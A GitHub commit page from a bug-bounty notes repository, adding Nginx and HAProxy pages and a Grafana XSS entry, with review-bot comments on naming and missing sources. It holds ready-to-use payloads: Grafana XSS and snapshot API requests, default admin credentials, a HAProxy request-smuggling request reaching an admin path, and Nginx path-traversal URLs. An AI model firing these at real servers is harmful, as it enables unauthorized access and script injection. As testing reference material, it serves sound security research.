mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
Add nginx & haproxy
This commit is contained in:
parent
2e29583535
commit
f9466632b0
@ -1,4 +1,4 @@
|
|||||||
# Bypass Rate Limit
|
# 429 Rate limit Bypass
|
||||||
1. Try add some custom header
|
1. Try add some custom header
|
||||||
```
|
```
|
||||||
X-Forwarded-For : 127.0.0.1
|
X-Forwarded-For : 127.0.0.1
|
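Review bot: The new title `# 429 Rate limit Bypass` is inconsistent with how this page is referenced elsewhere in the commit: the README keeps a `Bypass Rate Limit` entry and adds a separate `Bypass 429` entry. Pick one name, match its capitalisation in the heading (`Rate Limit`), and make sure only one file carries this content.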
@ -25,8 +25,8 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
||||||
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
||||||
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
- [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md)
|
||||||
|
- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
|
||||||
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
||||||
- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
|
|
||||||
- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
|
- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
|
||||||
|
|
||||||
## List CMS
|
## List CMS
|
||||||
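Review bot: The `Bypass File Upload` entry disappears from the list at the same place `Bypass 429` is added, which the commit message ("Add nginx & haproxy") does not mention. If the removal is not intended, restore the line; also confirm that `Bypass/Bypass%20429.md` exists, since `Bypass/Bypass%20Rate%20Limit.md` is still linked next to it.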
@ -47,9 +47,12 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||||
|
|
||||||
## Technologies
|
## Technologies
|
||||||
|
- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md)
|
||||||
|
- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md)
|
||||||
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||||
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||||
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||||
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)
|
||||||
|
|
||||||
## Reconnaissance
|
## Reconnaissance
|
||||||
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
||||||
|
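Review bot: The last added line labels the Nginx page as Moodle: `- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)`. The link text should be `Nginx`; as written the index shows two Moodle entries and no Nginx one. The Grafana line is also new here although the commit message only names nginx and haproxy.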
@ -1,9 +1,13 @@
|
|||||||
# Grafana
|
# Grafana
|
||||||
1. CVE-2020-13379 (Denial of Service)
|
1. CVE-2021-41174 (Reflected XSS)
|
||||||
|
```
|
||||||
|
<GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
|
||||||
|
```
|
||||||
|
2. CVE-2020-13379 (Denial of Service)
|
||||||
```
|
```
|
||||||
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
|
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
|
||||||
```
|
```
|
||||||
2. CVE-2020-11110 (Stored XSS)
|
3. CVE-2020-11110 (Stored XSS)
|
||||||
```
|
```
|
||||||
POST /api/snapshots HTTP/1.1
|
POST /api/snapshots HTTP/1.1
|
||||||
Host: <GRAFANA URL>
|
Host: <GRAFANA URL>
|
||||||
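Review bot: The new `1. CVE-2021-41174 (Reflected XSS)` entry has no source link or affected-version note, unlike the HAProxy page added in this commit, which ends with a `Source:` section. Add the reference the URL was taken from and the versions it applies to, so a reader can tell whether a given instance is already patched.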
@ -15,7 +19,7 @@ Connection: close
|
|||||||
|
|
||||||
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
|
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
|
||||||
```
|
```
|
||||||
3. CVE-2019-15043 (Grafana Unauthenticated API)
|
4. CVE-2019-15043 (Grafana Unauthenticated API)
|
||||||
```
|
```
|
||||||
POST /api/snapshots HTTP/1.1
|
POST /api/snapshots HTTP/1.1
|
||||||
Host: <GRAFANA URL>
|
Host: <GRAFANA URL>
|
||||||
@ -27,11 +31,11 @@ Content-Type: application/json
|
|||||||
|
|
||||||
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
||||||
```
|
```
|
||||||
4. Default Credentials
|
5. Default Credentials
|
||||||
```
|
```
|
||||||
Try to login using admin as username and password
|
Try to login using admin as username and password
|
||||||
```
|
```
|
||||||
5. Signup Enabled
|
6. Signup Enabled
|
||||||
```
|
```
|
||||||
<GRAFANA URL>/signup
|
<GRAFANA URL>/signup
|
||||||
```
|
```
|
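Review bot: Inserting one entry forced every later number in this file to be edited by hand (`4. Default Credentials` to `5.`, `5. Signup Enabled` to `6.`). Indenting each fenced block under its list item would keep this a single ordered list, so every item can be written `1.` and future additions touch only the new lines.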
15
Technologies/HAProxy.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
# HAProxy
|
||||||
|
1. CVE-2021-40346 (HTTP Request Smuggling)
|
||||||
|
```
|
||||||
|
POST /index.html HTTP/1.1
|
||||||
|
Host: abc.com
|
||||||
|
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
|
||||||
|
Content-Length: 60
|
||||||
|
|
||||||
|
GET /admin/add_user.py HTTP/1.1
|
||||||
|
Host: abc.com
|
||||||
|
abc: xyz
|
||||||
|
```
|
||||||
|
|
||||||
|
Source:
|
||||||
|
- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/)
|
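Review bot: The request is given with no explanation of the long `Content-Length0aaa…:` header line or of which HAProxy versions are affected, so a reader cannot tell what the example demonstrates or whether their deployment is fixed. Add a sentence summarising the issue from the linked JFrog post, together with the fixed versions it lists. Also, `abc.com` is a registrable domain; `example.com`, as used in Nginx.md, is the safer placeholder.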
11
Technologies/Nginx.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
# Nginx
|
||||||
|
|
||||||
|
1. Directory traversal
|
||||||
|
```
|
||||||
|
https://example.com/folder1../folder1/folder2/static/main.css
|
||||||
|
https://example.com/folder1../%s/folder2/static/main.css
|
||||||
|
https://example.com/folder1/folder2../folder2/static/main.css
|
||||||
|
https://example.com/folder1/folder2../%s/static/main.css
|
||||||
|
https://example.com/folder1/folder2/static../static/main.css
|
||||||
|
https://example.com/folder1/folder2/static../%s/main.css
|
||||||
|
```
|
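Review bot: Every second URL contains a literal `%s` (for example `https://example.com/folder1../%s/folder2/static/main.css`) with nothing saying what it stands for, and the entry does not state which Nginx configuration the `folder1../` pattern is testing or what response counts as a finding. Add a short description and a `Source:` section as in HAProxy.md.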